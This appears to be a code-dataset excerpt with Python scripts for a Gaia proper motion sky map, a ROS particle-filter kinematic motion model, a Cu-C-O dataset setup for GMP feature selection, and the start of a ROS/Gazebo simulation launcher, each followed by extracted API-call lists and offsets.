844), True, 'import numpy as np\n')]
|
"""
Plot an all-sky average proper motion map, using statistics downloaded from the Gaia archive with a query similar to the
following:
select
gaia_healpix_index(5, source_id) as healpix_5,
avg(pmra) as avg_pmra,
avg(pmdec) as avg_pmdec
from gaiaedr3.gaia_source
where parallax_over_error>=10
and parallax*parallax - 2*parallax - parallax_error*parallax_error < -1
group by healpix_5
<NAME> Oct 2020 - Dec 2020
"""
import argparse
import astropy.units as u
import astropy_healpix.healpy as hp
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
from astropy.coordinates import ICRS, Galactic
from astropy.table import Table
from matplotlib import cm
from matplotlib.gridspec import GridSpec
from matplotlib.patches import ArrowStyle
def make_plot(args):
"""
Take the steps to make the plot.
Parameters
----------
args: dict
Command line arguments
Returns
-------
Nothing
"""
infile = './data/' + args['inputFile']
basename = 'PMmap-' + args['inputFile'].split('.')[0]
default_proj = ccrs.PlateCarree()
sky_proj = ccrs.Mollweide()
backgr = plt.imread('../star-trail-animation/sky-images/GaiaSky-colour-2k.png')
nside = hp.order2nside(args['hplevel'])
hpcol = 'healpix_{0}'.format(args['hplevel'])
edr3data = Table.read(infile)
alpha, delta = hp.pix2ang(nside, edr3data[hpcol], lonlat=True, nest=True)
pmra = edr3data['avg_pmra']
pmdec = edr3data['avg_pmdec']
icrs = ICRS(ra=alpha * u.degree, dec=delta * u.degree, pm_ra_cosdec=pmra * u.mas / u.yr,
pm_dec=pmdec * u.mas / u.yr)
galactic = icrs.transform_to(Galactic)
pmtot = np.sqrt(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)
fig = plt.figure(figsize=(16, 9), dpi=120, frameon=False, tight_layout={'pad': 0.01})
gs = GridSpec(1, 1, figure=fig)
ax = fig.add_subplot(gs[0, 0], projection=sky_proj)
ax.imshow(np.fliplr(backgr), transform=default_proj, zorder=-1, origin='upper')
pmcmap = cm.viridis
veccolor = plt.cm.get_cmap('tab10').colors[9]
linecolor = plt.cm.get_cmap('tab10').colors[9]
if args['quiver']:
vscale = np.median(pmtot) / 10
ax.quiver(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, angles='xy', scale=vscale, scale_units='dots', color=veccolor,
headwidth=1, headlength=3, headaxislength=2.5)
else:
if args['colourstreams']:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=2.0, density=2, color=pmtot, cmap=pmcmap, maxlength=0.5,
arrowsize=1, arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4, tail_width=.4))
elif args['lwcode'] > 0:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=args['lwcode'] * pmtot / np.median(pmtot), density=2,
color=linecolor,
maxlength=0.5, arrowsize=1, arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4,
tail_width=.4))
else:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=1.5, density=2, color=linecolor, maxlength=0.5, arrowsize=1,
arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4, tail_width=.4))
ax.invert_xaxis()
if args['pdfOutput']:
plt.savefig(basename + '.pdf')
elif args['pngOutput']:
plt.savefig(basename + '.png')
else:
plt.show()
def parse_command_line_arguments():
"""
Set up command line parsing.
"""
parser = argparse.ArgumentParser("Produce all-sky proper motion map.")
parser.add_argument('inputFile', type=str, help="""VOT file with proper motion stats by Healpix.""")
parser.add_argument('hplevel', type=int, nargs='?', default=4, help="""Healpix level of input table.""")
parser.add_argument('--vectors', action="store_true", dest="quiver", help="Plot vectors instead of streamlines")
parser.add_argument('--colourcode', action='store_true', dest='colourstreams', help="""Plot streamlines colour coded
by magnitude of proper motion""")
parser.add_argument('--lwcode', type=float, default=0.0, help="""Plot streamlines with the width indicating the
magnitude of proper motion. Scale the widths by the factor provided""")
parser.add_argument("-p", action="store_true", dest="pdfOutput", help="Make PDF plot")
parser.add_argument("-b", action="store_true", dest="pngOutput", help="Make PNG plot")
args = vars(parser.parse_args())
return args
if __name__ in '__main__':
cmdargs = parse_command_line_arguments()
make_plot(cmdargs)
|
[
"numpy.median",
"numpy.sqrt",
"matplotlib.pyplot.savefig",
"argparse.ArgumentParser",
"matplotlib.pyplot.show",
"numpy.fliplr",
"cartopy.crs.Mollweide",
"matplotlib.pyplot.imread",
"cartopy.crs.PlateCarree",
"matplotlib.patches.ArrowStyle.Fancy",
"matplotlib.pyplot.figure",
"matplotlib.gridspec.GridSpec",
"astropy.coordinates.ICRS",
"matplotlib.pyplot.cm.get_cmap",
"astropy_healpix.healpy.pix2ang",
"astropy_healpix.healpy.order2nside",
"astropy.table.Table.read"
] |
[((1082, 1100), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (1098, 1100), True, 'import cartopy.crs as ccrs\n'), ((1116, 1132), 'cartopy.crs.Mollweide', 'ccrs.Mollweide', ([], {}), '()\n', (1130, 1132), True, 'import cartopy.crs as ccrs\n'), ((1147, 1217), 'matplotlib.pyplot.imread', 'plt.imread', (['"""../star-trail-animation/sky-images/GaiaSky-colour-2k.png"""'], {}), "('../star-trail-animation/sky-images/GaiaSky-colour-2k.png')\n", (1157, 1217), True, 'import matplotlib.pyplot as plt\n'), ((1231, 1262), 'astropy_healpix.healpy.order2nside', 'hp.order2nside', (["args['hplevel']"], {}), "(args['hplevel'])\n", (1245, 1262), True, 'import astropy_healpix.healpy as hp\n'), ((1328, 1346), 'astropy.table.Table.read', 'Table.read', (['infile'], {}), '(infile)\n', (1338, 1346), False, 'from astropy.table import Table\n'), ((1367, 1425), 'astropy_healpix.healpy.pix2ang', 'hp.pix2ang', (['nside', 'edr3data[hpcol]'], {'lonlat': '(True)', 'nest': '(True)'}), '(nside, edr3data[hpcol], lonlat=True, nest=True)\n', (1377, 1425), True, 'import astropy_healpix.healpy as hp\n'), ((1504, 1618), 'astropy.coordinates.ICRS', 'ICRS', ([], {'ra': '(alpha * u.degree)', 'dec': '(delta * u.degree)', 'pm_ra_cosdec': '(pmra * u.mas / u.yr)', 'pm_dec': '(pmdec * u.mas / u.yr)'}), '(ra=alpha * u.degree, dec=delta * u.degree, pm_ra_cosdec=pmra * u.mas /\n u.yr, pm_dec=pmdec * u.mas / u.yr)\n', (1508, 1618), False, 'from astropy.coordinates import ICRS, Galactic\n'), ((1686, 1751), 'numpy.sqrt', 'np.sqrt', (['(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)'], {}), '(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)\n', (1693, 1751), True, 'import numpy as np\n'), ((1763, 1842), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(16, 9)', 'dpi': '(120)', 'frameon': '(False)', 'tight_layout': "{'pad': 0.01}"}), "(figsize=(16, 9), dpi=120, frameon=False, tight_layout={'pad': 0.01})\n", (1773, 1842), True, 'import matplotlib.pyplot as plt\n'), ((1852, 1878), 'matplotlib.gridspec.GridSpec', 'GridSpec', (['(1)', '(1)'], {'figure': 'fig'}), '(1, 1, figure=fig)\n', (1860, 1878), False, 'from matplotlib.gridspec import GridSpec\n'), ((4004, 4065), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Produce all-sky proper motion map."""'], {}), "('Produce all-sky proper motion map.')\n", (4027, 4065), False, 'import argparse\n'), ((1949, 1966), 'numpy.fliplr', 'np.fliplr', (['backgr'], {}), '(backgr)\n', (1958, 1966), True, 'import numpy as np\n'), ((3777, 3807), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(basename + '.pdf')"], {}), "(basename + '.pdf')\n", (3788, 3807), True, 'import matplotlib.pyplot as plt\n'), ((2058, 2082), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""'], {}), "('tab10')\n", (2073, 2082), True, 'import matplotlib.pyplot as plt\n'), ((2109, 2133), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""'], {}), "('tab10')\n", (2124, 2133), True, 'import matplotlib.pyplot as plt\n'), ((2185, 2201), 'numpy.median', 'np.median', (['pmtot'], {}), '(pmtot)\n', (2194, 2201), True, 'import numpy as np\n'), ((3844, 3874), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(basename + '.png')"], {}), "(basename + '.png')\n", (3855, 3874), True, 'import matplotlib.pyplot as plt\n'), ((3893, 3903), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3901, 3903), True, 'import matplotlib.pyplot as plt\n'), ((2798, 2863), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (2814, 2863), False, 'from matplotlib.patches import ArrowStyle\n'), ((3227, 3292), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (3243, 3292), False, 'from matplotlib.patches import ArrowStyle\n'), ((3655, 3720), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (3671, 3720), False, 'from matplotlib.patches import ArrowStyle\n'), ((3090, 3106), 'numpy.median', 'np.median', (['pmtot'], {}), '(pmtot)\n', (3099, 3106), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
from threading import Lock
import numpy as np
import rospy
from std_msgs.msg import Float64
from vesc_msgs.msg import VescStateStamped
# Tune these Values!
KM_V_NOISE = 0.4 # Kinematic car velocity noise std dev
KM_DELTA_NOISE = 0.2 # Kinematic car delta noise std dev
KM_X_FIX_NOISE = 3e-2 # Kinematic car x position constant noise std dev
KM_Y_FIX_NOISE = 3e-2 # Kinematic car y position constant noise std dev
KM_THETA_FIX_NOISE = 1e-1 # Kinematic car theta constant noise std dev
# #Tune these Values!
# KM_V_NOISE = 0.01 # Kinematic car velocity noise std dev
# KM_DELTA_NOISE = 0.06 # Kinematic car delta noise std dev
# KM_X_FIX_NOISE = 3e-2 # Kinematic car x position constant noise std dev
# KM_Y_FIX_NOISE = 1e-3 # Kinematic car y position constant noise std dev
# KM_THETA_FIX_NOISE = 1e-2 # Kinematic car theta constant noise std dev
# #Tune these Values!
# KM_V_NOISE = 0.015 # Kinematic car velocity noise std dev
# KM_DELTA_NOISE = 0.065 # Kinematic car delta noise std dev
# KM_X_FIX_NOISE = 1e-2 # Kinematic car x position constant noise std dev
# KM_Y_FIX_NOISE = 1e-2 # Kinematic car y position constant noise std dev
# KM_THETA_FIX_NOISE = 1e-2 # Kinematic car theta constant noise std dev
"""
Propagates the particles forward based the velocity and steering angle of the car
"""
class KinematicMotionModel:
"""
Initializes the kinematic motion model
motor_state_topic: The topic containing motor state information
servo_state_topic: The topic containing servo state information
speed_to_erpm_offset: Offset conversion param from rpm to speed
speed_to_erpm_gain: Gain conversion param from rpm to speed
steering_angle_to_servo_offset: Offset conversion param from servo position to steering angle
steering_angle_to_servo_gain: Gain conversion param from servo position to steering angle
car_length: The length of the car
particles: The particles to propagate forward
state_lock: Controls access to particles
"""
def __init__(
self,
motor_state_topic,
servo_state_topic,
speed_to_erpm_offset,
speed_to_erpm_gain,
steering_to_servo_offset,
steering_to_servo_gain,
car_length,
particles,
state_lock=None,
):
self.last_servo_cmd = None # The most recent servo command
self.last_vesc_stamp = None # The time stamp from the previous vesc state msg
self.particles = particles
self.SPEED_TO_ERPM_OFFSET = (
speed_to_erpm_offset # Offset conversion param from rpm to speed
)
self.SPEED_TO_ERPM_GAIN = (
speed_to_erpm_gain # Gain conversion param from rpm to speed
)
self.STEERING_TO_SERVO_OFFSET = steering_to_servo_offset # Offset conversion param from servo position to steering angle
self.STEERING_TO_SERVO_GAIN = steering_to_servo_gain # Gain conversion param from servo position to steering angle
self.CAR_LENGTH = car_length # The length of the car
if state_lock is None:
self.state_lock = Lock()
else:
self.state_lock = state_lock
# This subscriber just caches the most recent servo position command
self.servo_pos_sub = rospy.Subscriber(
servo_state_topic, Float64, self.servo_cb, queue_size=1
)
# Subscribe to the state of the vesc
self.motion_sub = rospy.Subscriber(
motor_state_topic, VescStateStamped, self.motion_cb, queue_size=1
)
"""
Caches the most recent servo command
msg: A std_msgs/Float64 message
"""
def servo_cb(self, msg):
self.last_servo_cmd = msg.data # Update servo command
"""
Converts messages to controls and applies the kinematic car model to the
particles
msg: a vesc_msgs/VescStateStamped message
"""
def motion_cb(self, msg):
self.state_lock.acquire()
if self.last_servo_cmd is None:
self.state_lock.release()
return
if self.last_vesc_stamp is None:
print("Vesc callback called for first time....")
self.last_vesc_stamp = msg.header.stamp
self.state_lock.release()
return
# Convert raw msgs to controls
# Note that control = (raw_msg_val - offset_param) / gain_param
curr_speed = (
msg.state.speed - self.SPEED_TO_ERPM_OFFSET
) / self.SPEED_TO_ERPM_GAIN
curr_steering_angle = (
self.last_servo_cmd - self.STEERING_TO_SERVO_OFFSET
) / self.STEERING_TO_SERVO_GAIN
dt = (msg.header.stamp - self.last_vesc_stamp).to_sec()
# Propagate particles forward in place
self.apply_motion_model(
proposal_dist=self.particles, control=[curr_speed, curr_steering_angle, dt]
)
self.last_vesc_stamp = msg.header.stamp
self.state_lock.release()
def apply_motion_model(self, proposal_dist, control):
"""
Propagates particles forward (in-place) by applying the kinematic model and adding
sampled gaussian noise
proposal_dist: The particles to propagate
control: List containing velocity, steering angle, and timer interval - [v,delta,dt]
returns: nothing
"""
# Separate control
v, delta, dt = control
# Add control noise
v = np.random.normal(loc=v, scale=KM_V_NOISE, size=proposal_dist[:, 0].shape)
delta = np.random.normal(
loc=delta, scale=KM_DELTA_NOISE, size=proposal_dist[:, 0].shape
)
# apply motion model's update rule
theta = proposal_dist[:, 2]
theta_new = theta + v / self.CAR_LENGTH * np.tan(delta) * dt
# x
proposal_dist[:, 0] += (
self.CAR_LENGTH / np.tan(delta) * (np.sin(theta_new) - np.sin(theta))
)
# y
proposal_dist[:, 1] += (
self.CAR_LENGTH / np.tan(delta) * (-np.cos(theta_new) + np.cos(theta))
)
# Add noise
proposal_dist[:, 0] = np.random.normal(
loc=proposal_dist[:, 0],
scale=KM_X_FIX_NOISE,
size=proposal_dist[:, 0].shape,
)
proposal_dist[:, 1] = np.random.normal(
loc=proposal_dist[:, 1],
scale=KM_Y_FIX_NOISE,
size=proposal_dist[:, 1].shape,
)
proposal_dist[:, 2] = np.random.normal(
loc=theta_new, scale=KM_THETA_FIX_NOISE, size=proposal_dist[:, 2].shape
)
# print 'v: %f, delta: %f, x: %f, y: %f, theta: %f'%(np.mean(v), np.mean(delta), np.mean(proposal_dist[:,0]), np.mean(proposal_dist[:,1]), np.mean(proposal_dist[:,2]))
# Limit particle rotation to be between -pi and pi
proposal_dist[proposal_dist[:, 2] < -1 * np.pi, 2] += 2 * np.pi
proposal_dist[proposal_dist[:, 2] > np.pi, 2] -= 2 * np.pi
|
[
"numpy.random.normal",
"numpy.tan",
"threading.Lock",
"numpy.cos",
"numpy.sin",
"rospy.Subscriber"
] |
[((3544, 3617), 'rospy.Subscriber', 'rospy.Subscriber', (['servo_state_topic', 'Float64', 'self.servo_cb'], {'queue_size': '(1)'}), '(servo_state_topic, Float64, self.servo_cb, queue_size=1)\n', (3560, 3617), False, 'import rospy\n'), ((3711, 3798), 'rospy.Subscriber', 'rospy.Subscriber', (['motor_state_topic', 'VescStateStamped', 'self.motion_cb'], {'queue_size': '(1)'}), '(motor_state_topic, VescStateStamped, self.motion_cb,\n queue_size=1)\n', (3727, 3798), False, 'import rospy\n'), ((5694, 5767), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'v', 'scale': 'KM_V_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=v, scale=KM_V_NOISE, size=proposal_dist[:, 0].shape)\n', (5710, 5767), True, 'import numpy as np\n'), ((5784, 5870), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'delta', 'scale': 'KM_DELTA_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=delta, scale=KM_DELTA_NOISE, size=proposal_dist[:, 0].\n shape)\n', (5800, 5870), True, 'import numpy as np\n'), ((6363, 6463), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'proposal_dist[:, 0]', 'scale': 'KM_X_FIX_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=proposal_dist[:, 0], scale=KM_X_FIX_NOISE, size=\n proposal_dist[:, 0].shape)\n', (6379, 6463), True, 'import numpy as np\n'), ((6536, 6636), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'proposal_dist[:, 1]', 'scale': 'KM_Y_FIX_NOISE', 'size': 'proposal_dist[:, 1].shape'}), '(loc=proposal_dist[:, 1], scale=KM_Y_FIX_NOISE, size=\n proposal_dist[:, 1].shape)\n', (6552, 6636), True, 'import numpy as np\n'), ((6709, 6803), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'theta_new', 'scale': 'KM_THETA_FIX_NOISE', 'size': 'proposal_dist[:, 2].shape'}), '(loc=theta_new, scale=KM_THETA_FIX_NOISE, size=\n proposal_dist[:, 2].shape)\n', (6725, 6803), True, 'import numpy as np\n'), ((3375, 3381), 'threading.Lock', 'Lock', ([], {}), '()\n', (3379, 3381), False, 'from threading import Lock\n'), ((6112, 6125), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6118, 6125), True, 'import numpy as np\n'), ((6129, 6146), 'numpy.sin', 'np.sin', (['theta_new'], {}), '(theta_new)\n', (6135, 6146), True, 'import numpy as np\n'), ((6149, 6162), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (6155, 6162), True, 'import numpy as np\n'), ((6249, 6262), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6255, 6262), True, 'import numpy as np\n'), ((6287, 6300), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (6293, 6300), True, 'import numpy as np\n'), ((6018, 6031), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6024, 6031), True, 'import numpy as np\n'), ((6267, 6284), 'numpy.cos', 'np.cos', (['theta_new'], {}), '(theta_new)\n', (6273, 6284), True, 'import numpy as np\n')]
|
from ase import Atoms
from ase.calculators.emt import EMT
from ase.io.trajectory import Trajectory
from ase.io import read
import numpy as np
import pandas as pd
import argparse
import copy
import os
import pdb
import pickle
from model_eval import model_evaluation
from gmp_feature_selection import backward_elimination
def main():
dir_prefix = "/storage/home/hpaceice1/plai30/sandbox"
parallel_workspace = os.path.join(dir_prefix, "pace/parallel_workspace")
OUTPUT_DIR = os.path.join(dir_prefix, "output")
#setup dataset
np.random.seed(3)
distances = np.linspace(2, 5, 500)
images = []
for i in range(len(distances)):
l = distances[i]
image = Atoms(
"CuCO",
[
(-l * np.sin(0.65), l * np.cos(0.65), np.random.uniform(low=-4.0, high=4.0)),
(0, 0, 0),
(l * np.sin(0.65), l * np.cos(0.65), np.random.uniform(low=-4.0, high=4.0))
],
)
image.set_cell([10, 10, 10])
image.wrap(pbc=True)
image.set_calculator(EMT())
images.append(image)
elements = ["Cu","C","O"]
atom_gaussians = {"C": os.path.join(dir_prefix, "config/MCSH_potential/C_coredensity_5.g"),
"O": os.path.join(dir_prefix, "config/MCSH_potential/O_totaldensity_7.g"),
"Cu": os.path.join(dir_prefix, "config/MCSH_potential/Cu_totaldensity_5.g")}
data = model_evaluation.dataset(elements, images, atom_gaussians=atom_gaussians)
#set up evaluation parameters
cutoff = 8
sigmas = (np.logspace(np.log10(0.05), np.log10(1.0), num=5)).tolist()
model_eval_params = model_evaluation.get_model_eval_params(
fp_type="gmp", eval_type="k_fold_cv", eval_num_folds=2, eval_cv_iters=1,
cutoff=cutoff, sigmas=sigmas, nn_layers=3, nn_nodes=20, nn_learning_rate=1e-3,
nn_batch_size=32, nn_epochs=1000)
back_elim = backward_elimination.backward_elimination(data, model_eval_params)
back_elim.run(enable_parallel=True, parallel_workspace=parallel_workspace, seed=1, output_dir=OUTPUT_DIR)
if __name__ == "__main__":
main()
|
[
"model_eval.model_evaluation.dataset",
"gmp_feature_selection.backward_elimination.backward_elimination",
"numpy.log10",
"os.path.join",
"model_eval.model_evaluation.get_model_eval_params",
"ase.calculators.emt.EMT",
"numpy.linspace",
"numpy.random.seed",
"numpy.cos",
"numpy.random.uniform",
"numpy.sin"
] |
[((419, 470), 'os.path.join', 'os.path.join', (['dir_prefix', '"""pace/parallel_workspace"""'], {}), "(dir_prefix, 'pace/parallel_workspace')\n", (431, 470), False, 'import os\n'), ((488, 522), 'os.path.join', 'os.path.join', (['dir_prefix', '"""output"""'], {}), "(dir_prefix, 'output')\n", (500, 522), False, 'import os\n'), ((547, 564), 'numpy.random.seed', 'np.random.seed', (['(3)'], {}), '(3)\n', (561, 564), True, 'import numpy as np\n'), ((581, 603), 'numpy.linspace', 'np.linspace', (['(2)', '(5)', '(500)'], {}), '(2, 5, 500)\n', (592, 603), True, 'import numpy as np\n'), ((1442, 1515), 'model_eval.model_evaluation.dataset', 'model_evaluation.dataset', (['elements', 'images'], {'atom_gaussians': 'atom_gaussians'}), '(elements, images, atom_gaussians=atom_gaussians)\n', (1466, 1515), False, 'from model_eval import model_evaluation\n'), ((1664, 1901), 'model_eval.model_evaluation.get_model_eval_params', 'model_evaluation.get_model_eval_params', ([], {'fp_type': '"""gmp"""', 'eval_type': '"""k_fold_cv"""', 'eval_num_folds': '(2)', 'eval_cv_iters': '(1)', 'cutoff': 'cutoff', 'sigmas': 'sigmas', 'nn_layers': '(3)', 'nn_nodes': '(20)', 'nn_learning_rate': '(0.001)', 'nn_batch_size': '(32)', 'nn_epochs': '(1000)'}), "(fp_type='gmp', eval_type='k_fold_cv',\n eval_num_folds=2, eval_cv_iters=1, cutoff=cutoff, sigmas=sigmas,\n nn_layers=3, nn_nodes=20, nn_learning_rate=0.001, nn_batch_size=32,\n nn_epochs=1000)\n", (1702, 1901), False, 'from model_eval import model_evaluation\n'), ((1993, 2059), 'gmp_feature_selection.backward_elimination.backward_elimination', 'backward_elimination.backward_elimination', (['data', 'model_eval_params'], {}), '(data, model_eval_params)\n', (2034, 2059), False, 'from gmp_feature_selection import backward_elimination\n'), ((1166, 1233), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/C_coredensity_5.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/C_coredensity_5.g')\n", (1178, 1233), False, 'import os\n'), ((1262, 1330), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/O_totaldensity_7.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/O_totaldensity_7.g')\n", (1274, 1330), False, 'import os\n'), ((1360, 1429), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/Cu_totaldensity_5.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/Cu_totaldensity_5.g')\n", (1372, 1429), False, 'import os\n'), ((1072, 1077), 'ase.calculators.emt.EMT', 'EMT', ([], {}), '()\n', (1075, 1077), False, 'from ase.calculators.emt import EMT\n'), ((1592, 1606), 'numpy.log10', 'np.log10', (['(0.05)'], {}), '(0.05)\n', (1600, 1606), True, 'import numpy as np\n'), ((1608, 1621), 'numpy.log10', 'np.log10', (['(1.0)'], {}), '(1.0)\n', (1616, 1621), True, 'import numpy as np\n'), ((792, 829), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-4.0)', 'high': '(4.0)'}), '(low=-4.0, high=4.0)\n', (809, 829), True, 'import numpy as np\n'), ((912, 949), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-4.0)', 'high': '(4.0)'}), '(low=-4.0, high=4.0)\n', (929, 949), True, 'import numpy as np\n'), ((760, 772), 'numpy.sin', 'np.sin', (['(0.65)'], {}), '(0.65)\n', (766, 772), True, 'import numpy as np\n'), ((778, 790), 'numpy.cos', 'np.cos', (['(0.65)'], {}), '(0.65)\n', (784, 790), True, 'import numpy as np\n'), ((880, 892), 'numpy.sin', 'np.sin', (['(0.65)'], {}), '(0.65)\n', (886, 892), True, 'import numpy as np\n'), ((898, 910), 'numpy.cos', 'np.cos', (['(0.65)'], {}), '(0.65)\n', (904, 910), True, 'import numpy as np\n')]
|
#!/usr/bin/python
"""
Run_long_script governs the running of long gazebo_ros_tensorflow simulations.
The core functionality lies in:
1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)
2. different crash handling when for instance starting gazebo / tensorflow fails
The script is organized in different steps:
1. Parsing arguments saved in a name space
2. launching ROS and robot related parameters
3. launching tensorflow in machine (docker/singularity/virtualenv) environment
4. launching experiment with potentially autogenerated gazebo world
Exit code:
0) normal exit code
2) tensorflow stopped working
3) communication with logfolder (Opal) is blocked
4) config file is missing
Example usage:
Let behavior arbitration fly with drone through default canyon in singularity environment 1 time while saving images.
python run_script.py --robot drone_sim --fsm oracle_drone_fsm --world canyon --reuse_default_world -n 1 -ds -p params.yaml
Author: <NAME>
Dependecies: simulation_supervised, pilot, klaas_robots
"""
import rospy
from std_srvs.srv import Empty as Emptyservice
from std_srvs.srv import EmptyRequest # for pausing and unpausing physics engine
from geometry_msgs.msg import Pose
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.srv import SetModelStateRequest
from gazebo_msgs.msg import ModelState
import ast # to parse startingpositions as string to list
import sys, os, os.path
import subprocess, shlex
import shutil
import time
import signal
import argparse
import yaml
import fnmatch
import numpy as np
class bcolors:
""" Colors to print in terminal with color!
"""
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# global variables for Popen objects used for terminating sessions
ros_popen = None
python_popen = None
gazebo_popen = None
crash_number = 0
run_number = 0
def myprint(message):
"""
Output is not captured on computing cluster,
therefore write it away to logfolder/output as well
"""
print(message)
with open(FLAGS.summary_dir+FLAGS.log_tag+'/output','a') as f:
f.write(message+'\n')
# Predefined functions.
def load_param_file(location):
"""Load yaml as dict and change to proper string arguments.
Note that current implementation will by default change both --key True and --key False to --key."""
yaml_dict={}
with open(location, 'r') as stream:
try:
yaml_dict=yaml.load(stream)
except yaml.YAMLError as exc:
myprint(exc)
yaml_str=""
for k in yaml_dict.keys():
if isinstance(yaml_dict[k],bool):
yaml_str = "{0} --{1}".format(yaml_str, k)
else:
yaml_str = "{0} --{1} {2}".format(yaml_str, k, yaml_dict[k])
return yaml_str
def wait_for_gazebo():
"""gazebo popen is not enough to get gzserver to stop so wait longer..."""
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","gz"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
myprint("{0}: wait for gazebo".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
out = p_grep.communicate()[0]
while "gzserver" in out:
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","gz"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
out = p_grep.communicate()[0]
time.sleep(0.2)
time.sleep(1)
def wait_for_create_dataset():
"""gazebo popen is not enough to get gzserver to stop so wait longer..."""
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","create_dataset"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
myprint("{0}: wait for create_dataset".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
out = p_grep.communicate()[0]
while "create_dataset" in out:
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","create_dataset"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
out = p_grep.communicate()[0]
time.sleep(0.2)
def wait_for_ros_to_start():
"""Ros might take some time to start the first time so wait till its well in the ps -ef"""
time.sleep(1)
p_ps = subprocess.call(["rosparam", "list"], stdout=subprocess.PIPE)
while p_ps == 1:
myprint("{0}: wait for ros".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
time.sleep(1)
p_ps = subprocess.call(["rosparam", "list"], stdout=subprocess.PIPE)
def kill_popen(process_name, process_popen):
"""Check status, terminate popen and wait for it to stop."""
myprint("{0}: terminate {1}".format(time.strftime("%Y-%m-%d_%I:%M:%S"), process_name))
if process_popen.poll() == None:
process_popen.terminate()
process_popen.wait()
def kill_combo():
"""kill ros, python and gazebo pids and wait for them to finish"""
global ros_popen, python_popen, gazebo_popen
if gazebo_popen: kill_popen('gazebo', gazebo_popen)
wait_for_gazebo()
if python_popen: kill_popen('python', python_popen)
if ros_popen: kill_popen('ros', ros_popen)
time.sleep(5)
##########################################################################################################################
# STEP 1 Load Parameters
parser = argparse.ArgumentParser(description="""Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.
The core functionality lies in:
1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)
2. different crash handling when for instance starting gazebo / tensorflow fails""")
# ==========================
# General Settings
# ==========================
parser.add_argument("--summary_dir", default='tensorflow/log/', type=str, help="Choose the directory to which tensorflow should save the summaries.")
